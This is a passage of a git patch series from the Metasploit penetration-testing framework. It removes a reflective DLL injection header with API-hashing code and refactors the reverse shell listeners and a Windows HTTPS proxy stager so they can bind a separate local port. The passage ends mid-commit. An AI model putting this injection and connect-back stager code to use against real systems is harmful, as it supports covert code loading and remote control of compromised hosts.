-//===============================================================================================// diff --git a/external/source/vncdll/loader/ReflectiveLoader.h b/external/source/vncdll/loader/ReflectiveLoader.h deleted file mode 100644 index 597eb5d457..0000000000 --- a/external/source/vncdll/loader/ReflectiveLoader.h +++ /dev/null @@ -1,197 +0,0 @@ -//===============================================================================================// -// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -// All rights reserved. -// -// Redistribution and use in source and binary forms, with or without modification, are permitted -// provided that the following conditions are met: -// -// * Redistributions of source code must retain the above copyright notice, this list of -// conditions and the following disclaimer. -// -// * Redistributions in binary form must reproduce the above copyright notice, this list of -// conditions and the following disclaimer in the documentation and/or other materials provided -// with the distribution. -// -// * Neither the name of Harmony Security nor the names of its contributors may be used to -// endorse or promote products derived from this software without specific prior written permission. - // -// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR -// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND -// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR -// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR -// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR -// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY -// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR -// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE -// POSSIBILITY OF SUCH DAMAGE. -//===============================================================================================// -#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H -#define _VNCDLL_LOADER_REFLECTIVELOADER_H -//===============================================================================================// -#define WIN32_LEAN_AND_MEAN -#include -#include -#include - -#include "ReflectiveDLLInjection.h" - -#define EXITFUNC_SEH 0xEA320EFE -#define EXITFUNC_THREAD 0x0A2A1DE0 -#define EXITFUNC_PROCESS 0x56A2B5F0 - -typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR ); -typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR ); -typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD ); - -#define KERNEL32DLL_HASH 0x6A4ABC5B -#define LOADLIBRARYA_HASH 0xEC0E4E8E -#define GETPROCADDRESS_HASH 0x7C0DFCAA -#define VIRTUALALLOC_HASH 0x91AFCA54 - -#define HASH_KEY 13 -//===============================================================================================// -#pragma intrinsic( _rotr ) - -__forceinline DWORD ror( DWORD d ) -{ - return _rotr( d, HASH_KEY ); -} - - - -__forceinline DWORD hash( char * c ) -{ - register DWORD h = 0; - do - { - h = ror( h ); - h += *c; - } while( *++c ); - - return h; -} -//===============================================================================================// -typedef struct _UNICODE_STR -{ - USHORT Length; - USHORT MaximumLength; - PWSTR pBuffer; -} UNICODE_STR, *PUNICODE_STR; - -// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY -//__declspec( align(8) ) -typedef struct _LDR_DATA_TABLE_ENTRY -{ - //LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry. - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - PVOID DllBase; - PVOID EntryPoint; - ULONG SizeOfImage; - UNICODE_STR FullDllName; - UNICODE_STR BaseDllName; - ULONG Flags; - SHORT LoadCount; - SHORT TlsIndex; - LIST_ENTRY HashTableEntry; - ULONG TimeDateStamp; -} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY; - -// WinDbg> dt -v ntdll!_PEB_LDR_DATA -typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes -{ - DWORD dwLength; - DWORD dwInitialized; - LPVOID lpSsHandle; - LIST_ENTRY InLoadOrderModuleList; - LIST_ENTRY InMemoryOrderModuleList; - LIST_ENTRY InInitializationOrderModuleList; - LPVOID lpEntryInProgress; -} PEB_LDR_DATA, * PPEB_LDR_DATA; - -// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK -typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes -{ - struct _PEB_FREE_BLOCK * pNext; - DWORD dwSize; -} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; - -// struct _PEB is defined in Winternl.h but it is incomplete -// WinDbg> dt -v ntdll!_PEB -typedef struct __PEB // 65 elements, 0x210 bytes -{ - BYTE bInheritedAddressSpace; - BYTE bReadImageFileExecOptions; - BYTE bBeingDebugged; - BYTE bSpareBool; - LPVOID lpMutant; - LPVOID lpImageBaseAddress; - PPEB_LDR_DATA pLdr; - LPVOID lpProcessParameters; - LPVOID lpSubSystemData; - LPVOID lpProcessHeap; - PRTL_CRITICAL_SECTION pFastPebLock; - LPVOID lpFastPebLockRoutine; - LPVOID lpFastPebUnlockRoutine; - DWORD dwEnvironmentUpdateCount; - LPVOID lpKernelCallbackTable; - DWORD dwSystemReserved; - DWORD dwAtlThunkSListPtr32; - PPEB_FREE_BLOCK pFreeList; - DWORD dwTlsExpansionCounter; - LPVOID lpTlsBitmap; - DWORD dwTlsBitmapBits[2]; - LPVOID lpReadOnlySharedMemoryBase; - LPVOID lpReadOnlySharedMemoryHeap; - LPVOID lpReadOnlyStaticServerData; - LPVOID lpAnsiCodePageData; - LPVOID lpOemCodePageData; - LPVOID lpUnicodeCaseTableData; - DWORD dwNumberOfProcessors; - DWORD dwNtGlobalFlag; - LARGE_INTEGER liCriticalSectionTimeout; - DWORD dwHeapSegmentReserve; - DWORD dwHeapSegmentCommit; - DWORD dwHeapDeCommitTotalFreeThreshold; - DWORD dwHeapDeCommitFreeBlockThreshold; - DWORD dwNumberOfHeaps; - DWORD dwMaximumNumberOfHeaps; - LPVOID lpProcessHeaps; - LPVOID lpGdiSharedHandleTable; - LPVOID lpProcessStarterHelper; - DWORD dwGdiDCAttributeList; - LPVOID lpLoaderLock; - DWORD dwOSMajorVersion; - DWORD dwOSMinorVersion; - WORD wOSBuildNumber; - WORD wOSCSDVersion; - DWORD dwOSPlatformId; - DWORD dwImageSubsystem; - DWORD dwImageSubsystemMajorVersion; - DWORD dwImageSubsystemMinorVersion; - DWORD dwImageProcessAffinityMask; - DWORD dwGdiHandleBuffer[34]; - LPVOID lpPostProcessInitRoutine; - LPVOID lpTlsExpansionBitmap; - DWORD dwTlsExpansionBitmapBits[32]; - DWORD dwSessionId; - ULARGE_INTEGER liAppCompatFlags; - ULARGE_INTEGER liAppCompatFlagsUser; - LPVOID lppShimData; - LPVOID lpAppCompatInfo; - UNICODE_STR usCSDVersion; - LPVOID lpActivationContextData; - LPVOID lpProcessAssemblyStorageMap; - LPVOID lpSystemDefaultActivationContextData; - LPVOID lpSystemAssemblyStorageMap; - DWORD dwMinimumStackCommit; -} _PEB, * _PPEB; - -typedef struct -{ - WORD offset:12; - WORD type:4; -} IMAGE_RELOC, *PIMAGE_RELOC; -//===============================================================================================// -#endif -//===============================================================================================// diff --git a/external/source/vncdll/loader/inject.c b/external/source/vncdll/loader/inject.c index d0386434dc..d82a8efdbd 100644 --- a/external/source/vncdll/loader/inject.c +++ b/external/source/vncdll/loader/inject.c @@ -1,7 +1,7 @@ #include "loader.h" #include "ps.h" #include "inject.h" -#include "LoadLibraryR.h" +#include "ReflectiveLoader.h" #include // Simple trick to get the current meterpreters arch diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj index 79c60dcb46..21dfb4ddbb 100644 --- a/external/source/vncdll/loader/loader.vcproj +++ b/external/source/vncdll/loader/loader.vcproj @@ -44,7 +44,8 @@ + + @@ -392,15 +400,15 @@ Name="rdi" > From f51531f9f873d0ece528312f07af333c8dfe4ca9 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Sat, 7 Sep 2013 15:11:43 +0100 Subject: [PATCH 004/205] Add IncludeDirectory --- external/source/vncdll/loader/inject.c | 2 +- external/source/vncdll/loader/loader.vcproj | 8 ++++---- 2 files changed, 5 insertions(+), 5 deletions(-) diff --git a/external/source/vncdll/loader/inject.c b/external/source/vncdll/loader/inject.c index d82a8efdbd..d0386434dc 100644 --- a/external/source/vncdll/loader/inject.c +++ b/external/source/vncdll/loader/inject.c @@ -1,7 +1,7 @@ #include "loader.h" #include "ps.h" #include "inject.h" -#include "ReflectiveLoader.h" +#include "LoadLibraryR.h" #include // Simple trick to get the current meterpreters arch diff --git a/external/source/vncdll/loader/loader.vcproj b/external/source/vncdll/loader/loader.vcproj index 21dfb4ddbb..4d28833c6a 100644 --- a/external/source/vncdll/loader/loader.vcproj +++ b/external/source/vncdll/loader/loader.vcproj @@ -45,7 +45,7 @@ Name="VCCLCompilerTool" Optimization="0" PreprocessorDefinitions="WIN32;WIN_X86;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\" + AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" @@ -118,7 +118,7 @@ Name="VCCLCompilerTool" Optimization="0" PreprocessorDefinitions="WIN32;_DEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\" + AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" MinimalRebuild="true" BasicRuntimeChecks="3" RuntimeLibrary="3" @@ -193,7 +193,7 @@ Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="WIN32;WIN_X86;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN;" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\" + AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" @@ -278,7 +278,7 @@ Optimization="2" EnableIntrinsicFunctions="true" PreprocessorDefinitions="WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;_CRT_SECURE_NO_WARNINGS;REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN" - AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\" + AdditionalIncludeDirectories="..\..\ReflectiveDLLInjection\dll\src\;..\..\ReflectiveDLLInjection\inject\src\;" RuntimeLibrary="0" EnableFunctionLevelLinking="true" UsePrecompiledHeader="0" From 58cd2c796ec2e98893cf56e2fc64d645b1f40011 Mon Sep 17 00:00:00 2001 From: OJ Date: Sat, 28 Sep 2013 05:38:39 +1000 Subject: [PATCH 005/205] Add a bind port setting to reverse listeners This adds a `ReverseListenerBindPort` advanced setting to the reverse listeners whic allows for the local bind port to be separated from the `LHOST` setting used in the payload. This means that listeners can bind to different ports in cases where the attacker isn't able to listen on the same port that the victim can call out on, but there are NATs/portforwards/whatever in place that allow the connection to happen. --- lib/msf/core/handler/reverse_http.rb | 59 +++++++++++++++---------- lib/msf/core/handler/reverse_tcp.rb | 54 ++++++++++++++-------- lib/msf/core/handler/reverse_tcp_ssl.rb | 54 ++++++++++++++-------- 3 files changed, 106 insertions(+), 61 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index 583de796e2..faac3e845c 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -83,23 +83,10 @@ module ReverseHttp # addresses. # def full_uri - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end - if lhost.empty? or lhost == "0.0.0.0" or lhost == "::" - lhost = Rex::Socket.source_address - end - lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + addrs = bind_address(datastore) + local_port = bind_port(datastore) scheme = (ssl?) ? "https" : "http" - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - uri = "#{scheme}://#{lhost}:#{datastore["HIDDENPORT"]}/" - else - uri = "#{scheme}://#{lhost}:#{datastore["LPORT"]}/" - end - - uri + "#{scheme}://#{addrs[0]}:#{local_port}/" end # @@ -163,6 +150,7 @@ module ReverseHttp OptString.new('MeterpreterUserAgent', [ false, 'The user-agent that the payload should use for communication', 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)' ]), OptString.new('MeterpreterServerName', [ false, 'The server header that the handler will send in response to requests', 'Apache' ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('HttpUnknownRequestResponse', [ false, 'The returned HTML response body when the handler receives a request that is not from a payload', '

It works!

' ]) ], Msf::Handler::ReverseHttp) end @@ -186,17 +174,13 @@ module ReverseHttp comm = nil end - # Determine where to bind the HTTP(S) server to - bindaddrs = ipv6 ? '::' : '0.0.0.0' - - if not datastore['ReverseListenerBindAddress'].to_s.empty? - bindaddrs = datastore['ReverseListenerBindAddress'] - end + local_port = bind_port(datastore) + addrs = bind_address(datastore) # Start the HTTPS server service on this host/port self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, - datastore['LPORT'].to_i, - bindaddrs, + local_port, + addrs[0], ssl?, { 'Msf' => framework, @@ -413,6 +397,33 @@ protected obj.service.close_client( cli ) end +protected + + def bind_port(datastore) + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address(datastore) + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index fb7b042660..a73ea4c239 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -53,8 +53,9 @@ module ReverseTcp [ OptInt.new('ReverseConnectRetries', [ true, 'The number of connection attempts to try before exiting the process', 5 ]), OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]), OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener']), - OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]), + OptBool.new('ReverseAllowProxy', [ true, 'Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST', false]) ], Msf::Handler::ReverseTcp) @@ -72,13 +73,6 @@ module ReverseTcp end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -87,19 +81,15 @@ module ReverseTcp comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port(datastore) + addrs = bind_address(datastore) - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin self.listener_sock = Rex::Socket::TcpServer.create( 'LocalHost' => ip, - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalPort' => local_port, 'Comm' => comm, 'Context' => { @@ -119,11 +109,11 @@ module ReverseTcp via = "" end - print_status("Started reverse handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) @@ -140,7 +130,8 @@ module ReverseTcp # Starts monitoring for an inbound connection. # def start_handler - self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{datastore['LPORT']}", false) { + local_port = bind_port(datastore) + self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) { client = nil begin @@ -159,7 +150,7 @@ module ReverseTcp end while true } - self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{datastore['LPORT']}", false) { + self.handler_thread = framework.threads.spawn("ReverseTcpHandlerWorker-#{local_port}", false) { while true client = self.handler_queue.pop begin @@ -241,6 +232,31 @@ module ReverseTcp protected + def bind_port(datastore) + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address(datastore) + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + attr_accessor :listener_sock # :nodoc: attr_accessor :listener_thread # :nodoc: attr_accessor :handler_thread # :nodoc: diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 61a1ae8b4a..48bef7cf59 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -43,7 +43,9 @@ module ReverseTcpSsl super register_advanced_options( [ - OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']) + OptPath.new('SSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)']), + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) ], Msf::Handler::ReverseTcpSsl) end @@ -59,13 +61,6 @@ module ReverseTcpSsl end ex = false - # Switch to IPv6 ANY address if the LHOST is also IPv6 - addr = Rex::Socket.resolv_nbo(datastore['LHOST']) - # First attempt to bind LHOST. If that fails, the user probably has - # something else listening on that interface. Try again with ANY_ADDR. - any = (addr.length == 4) ? "0.0.0.0" : "::0" - - addrs = [ Rex::Socket.addr_ntoa(addr), any ] comm = datastore['ReverseListenerComm'] if comm.to_s == "local" @@ -74,20 +69,16 @@ module ReverseTcpSsl comm = nil end - if not datastore['ReverseListenerBindAddress'].to_s.empty? - # Only try to bind to this specific interface - addrs = [ datastore['ReverseListenerBindAddress'] ] + local_port = bind_port(datastore) + addrs = bind_address(datastore) - # Pick the right "any" address if either wildcard is used - addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") - end addrs.each { |ip| begin comm.extend(Rex::Socket::SslTcp) self.listener_sock = Rex::Socket::SslTcpServer.create( - 'LocalHost' => datastore['LHOST'], - 'LocalPort' => datastore['LPORT'].to_i, + 'LocalHost' => ip, + 'LocalPort' => local_port, 'Comm' => comm, 'SSLCert' => datastore['SSLCert'], 'Context' => @@ -108,16 +99,43 @@ module ReverseTcpSsl via = "" end - print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") + print_status("Started reverse SSL handler on #{ip}:#{local_port} #{via}") break rescue ex = $! - print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + print_error("Handler failed to bind to #{ip}:#{local_port}") end } raise ex if (ex) end +protected + + def bind_port(datastore) + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address(datastore) + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end end From 12810580d6557cde747d2e4a3f0eb1a0bc8ee585 Mon Sep 17 00:00:00 2001 From: OJ Date: Tue, 5 Nov 2013 06:56:21 +1000 Subject: [PATCH 006/205] Remove arg for bind port/addr functions Done to avoid masking of datastore instance variable. --- lib/msf/core/handler/reverse_http.rb | 12 ++++++------ lib/msf/core/handler/reverse_tcp.rb | 10 +++++----- lib/msf/core/handler/reverse_tcp_ssl.rb | 8 ++++---- 3 files changed, 15 insertions(+), 15 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index faac3e845c..94e9376fae 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -83,8 +83,8 @@ module ReverseHttp # addresses. # def full_uri - addrs = bind_address(datastore) - local_port = bind_port(datastore) + addrs = bind_address + local_port = bind_port scheme = (ssl?) ? "https" : "http" "#{scheme}://#{addrs[0]}:#{local_port}/" end @@ -174,8 +174,8 @@ module ReverseHttp comm = nil end - local_port = bind_port(datastore) - addrs = bind_address(datastore) + local_port = bind_port + addrs = bind_address # Start the HTTPS server service on this host/port self.service = Rex::ServiceManager.start(Rex::Proto::Http::Server, @@ -399,12 +399,12 @@ protected protected - def bind_port(datastore) + def bind_port port = datastore['ReverseListenerBindPort'].to_i port > 0 ? port : datastore['LPORT'].to_i end - def bind_address(datastore) + def bind_address # Switch to IPv6 ANY address if the LHOST is also IPv6 addr = Rex::Socket.resolv_nbo(datastore['LHOST']) # First attempt to bind LHOST. If that fails, the user probably has diff --git a/lib/msf/core/handler/reverse_tcp.rb b/lib/msf/core/handler/reverse_tcp.rb index a73ea4c239..62d220ade3 100644 --- a/lib/msf/core/handler/reverse_tcp.rb +++ b/lib/msf/core/handler/reverse_tcp.rb @@ -81,8 +81,8 @@ module ReverseTcp comm = nil end - local_port = bind_port(datastore) - addrs = bind_address(datastore) + local_port = bind_port + addrs = bind_address addrs.each { |ip| begin @@ -130,7 +130,7 @@ module ReverseTcp # Starts monitoring for an inbound connection. # def start_handler - local_port = bind_port(datastore) + local_port = bind_port self.listener_thread = framework.threads.spawn("ReverseTcpHandlerListener-#{local_port}", false) { client = nil @@ -232,12 +232,12 @@ module ReverseTcp protected - def bind_port(datastore) + def bind_port port = datastore['ReverseListenerBindPort'].to_i port > 0 ? port : datastore['LPORT'].to_i end - def bind_address(datastore) + def bind_address # Switch to IPv6 ANY address if the LHOST is also IPv6 addr = Rex::Socket.resolv_nbo(datastore['LHOST']) # First attempt to bind LHOST. If that fails, the user probably has diff --git a/lib/msf/core/handler/reverse_tcp_ssl.rb b/lib/msf/core/handler/reverse_tcp_ssl.rb index 48bef7cf59..e469054d65 100644 --- a/lib/msf/core/handler/reverse_tcp_ssl.rb +++ b/lib/msf/core/handler/reverse_tcp_ssl.rb @@ -69,8 +69,8 @@ module ReverseTcpSsl comm = nil end - local_port = bind_port(datastore) - addrs = bind_address(datastore) + local_port = bind_port + addrs = bind_address addrs.each { |ip| begin @@ -111,12 +111,12 @@ module ReverseTcpSsl protected - def bind_port(datastore) + def bind_port port = datastore['ReverseListenerBindPort'].to_i port > 0 ? port : datastore['LPORT'].to_i end - def bind_address(datastore) + def bind_address # Switch to IPv6 ANY address if the LHOST is also IPv6 addr = Rex::Socket.resolv_nbo(datastore['LHOST']) # First attempt to bind LHOST. If that fails, the user probably has From 063da8a22e3db80dcef42168abe868e9aea102d1 Mon Sep 17 00:00:00 2001 From: OJ Date: Mon, 11 Nov 2013 22:21:05 +1000 Subject: [PATCH 007/205] Update reverse_https_proxy stager/handler This change updates the proxy handler code, which for some reason was ommitted in the orginal commits. This now uses the same mechanism as the new code. It removes `HIDDENHOST` and `HIDDENPORT`, and instead uses `ReverseListenerBindHost` and `ReverseListenerBindAddress`. --- lib/msf/core/handler/reverse_https_proxy.rb | 8 +++- .../stagers/windows/reverse_https_proxy.rb | 40 ++++++++++++++----- 2 files changed, 36 insertions(+), 12 deletions(-) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 10ec427f6b..1cc216f6d6 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb @@ -42,13 +42,17 @@ module ReverseHttpsProxy OptPort.new('LPORT', [ true, "The local listener port", 8443 ]), OptString.new('PROXYHOST', [true, "The address of the http proxy to use" ,"127.0.0.1"]), OptInt.new('PROXYPORT', [ false, "The Proxy port to connect to", 8080 ]), - OptString.new('HIDDENHOST', [false, "The tor hidden host to connect to, when set it will be used instead of LHOST for stager generation"]), - OptInt.new('HIDDENPORT', [ false, "The hidden port to connect to, when set it will be used instead of LPORT for stager generation"]), OptEnum.new('PROXY_TYPE', [true, 'Http or Socks4 proxy type', 'HTTP', ['HTTP', 'SOCKS']]), OptString.new('PROXY_USERNAME', [ false, "An optional username for HTTP proxy authentification"]), OptString.new('PROXY_PASSWORD', [ false, "An optional password for HTTP proxy authentification"]) ], Msf::Handler::ReverseHttpsProxy) + register_advanced_options( + [ + OptAddress.new('ReverseListenerBindAddress', [ false, 'The specific IP address to bind to on the local system']), + OptInt.new('ReverseListenerBindPort', [ false, 'The port to bind to on the local system if different from LPORT' ]) + ], Msf::Handler::ReverseHttpsProxy) + end end diff --git a/modules/payloads/stagers/windows/reverse_https_proxy.rb b/modules/payloads/stagers/windows/reverse_https_proxy.rb index fe83475b03..3794ce3d9e 100644 --- a/modules/payloads/stagers/windows/reverse_https_proxy.rb +++ b/modules/payloads/stagers/windows/reverse_https_proxy.rb @@ -134,11 +134,7 @@ module Metasploit3 p[p.length - 4, 4] = [p[p.length - 4, 4].unpack("l")[0] + jmp_offset].pack("V") # patch the LPORT - unless datastore['HIDDENPORT'].nil? or datastore['HIDDENPORT'] == 0 - lport = datastore['HIDDENPORT'] - else - lport = datastore['LPORT'] - end + lport = bind_port lportloc = p.index("\x68\x5c\x11\x00\x00") # PUSH DWORD 4444 p[lportloc+1] = [lport.to_i].pack('V')[0] @@ -148,11 +144,7 @@ module Metasploit3 # append LHOST and return payload - unless datastore['HIDDENHOST'].nil? or datastore['HIDDENHOST'].empty? - lhost = datastore['HIDDENHOST'] - else - lhost = datastore['LHOST'] - end + lhost = bind_address p + lhost.to_s + "\x00" end @@ -163,5 +155,33 @@ module Metasploit3 def wfs_delay 20 end + +protected + + def bind_port + port = datastore['ReverseListenerBindPort'].to_i + port > 0 ? port : datastore['LPORT'].to_i + end + + def bind_address + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + if not datastore['ReverseListenerBindAddress'].to_s.empty? + # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + + addrs + end + end From b73260b74c877196f2c8e966ff2de7cbdd92653b Mon Sep 17 00:00:00 2001 From: jiuweigui Date: Sun, 17 Nov 2013 22:10:55 +0200 Subject: [PATCH 008/205] Add functionality to enum_prefetch post module --- modules/post/windows/gather/enum_prefetch.rb | 91 +++++++++++++------- 1 file changed, 61 insertions(+), 30 deletions(-) diff --git a/modules/post/windows/gather/enum_prefetch.rb b/modules/post/windows/gather/enum_prefetch.rb index cbc121bc6e..c7436fac8d 100644 --- a/modules/post/windows/gather/enum_prefetch.rb +++ b/modules/post/windows/gather/enum_prefetch.rb @@ -3,10 +3,10 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +require 'msf/core' +class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry @@ -15,12 +15,13 @@ class Metasploit3 < Msf::Post super(update_info(info, 'Name' => 'Windows Gather 